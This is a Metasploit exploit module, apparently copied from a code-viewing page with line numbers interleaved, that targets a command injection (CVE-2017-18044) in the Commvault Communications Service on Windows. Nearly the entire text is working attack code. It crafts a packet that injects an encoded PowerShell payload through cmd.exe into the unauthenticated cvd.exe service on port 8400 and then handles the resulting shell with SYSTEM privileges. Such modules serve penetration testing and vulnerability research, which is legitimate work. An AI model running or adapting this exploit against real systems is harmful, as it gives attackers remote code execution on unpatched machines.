Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = GoodRanking
9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Powershell
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'           => 'Commvault Communications Service (cvd) Command Injection',
15
      'Description'    => %q{
16
        This module exploits a command injection vulnerability
17
        discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
18
        and v10). The vulnerability exists in the cvd.exe service and allows an
19
        attacker to execute arbitrary commands in the context of the service. By
20
        default, the Commvault Communications service installs and runs as SYSTEM in
21
        Windows and does not require authentication. This vulnerability was discovered
22
        in the Windows version. The Linux version wasn't tested.
23
      },
24
      'License'        => MSF_LICENSE,
25
      'Author'         =>
26
        [
27
          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
28
        ],
29
      'References'     =>
30
        [
31
          ['CVE', '2017-18044'],
32
          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
33
        ],
34
      'Platform'       => 'win',
35
      'Targets'        =>
36
        [
37
          [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
38
            {
39
              'Arch' => [ARCH_X64, ARCH_X86]
40
            }
41
          ],
42
        ],
43
      'Privileged'     => true,
44
      'DefaultTarget'  => 0,
45
      'DisclosureDate' => '2017-12-12'))
46

47
      register_options([Opt::RPORT(8400)])
48

49
    end
50

51
  def exploit
52

53
    buf = build_exploit
54
    print_status("Connecting to Commvault Communications Service.")
55
    connect
56
    print_status("Executing payload")
57
    #Send the payload
58
    sock.put(buf)
59
    #Handle the shell
60
    handler
61
    disconnect
62

63
  end
64

65

66
  def build_exploit
67

68
    #Get encoded powershell of payload
69
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
70
    #Remove additional cmd.exe call
71
    psh = "powershell"
72
    idx = command.index(psh)
73
    command = command[(idx)..-1]
74

75
    #Build packet
76
    cmd_path = 'C:\Windows\System32\cmd.exe'
77
    msg_type = 9
78
    zero = 0
79
    payload = ""
80
    payload += make_nops(8)
81
    payload += [msg_type].pack('I>')
82
    payload += make_nops(328)
83
    payload += cmd_path
84
    payload += ";"
85
    payload += ' /c "'
86
    payload += command
87
    payload += '" && echo '
88
    payload += "\x00"
89
    payload += [zero].pack('I>')
90

91
    #Add length header and payload
92
    ret_data = [payload.length].pack('I>')
93
    ret_data += payload
94

95
    ret_data
96

97
  end
98
end
99

100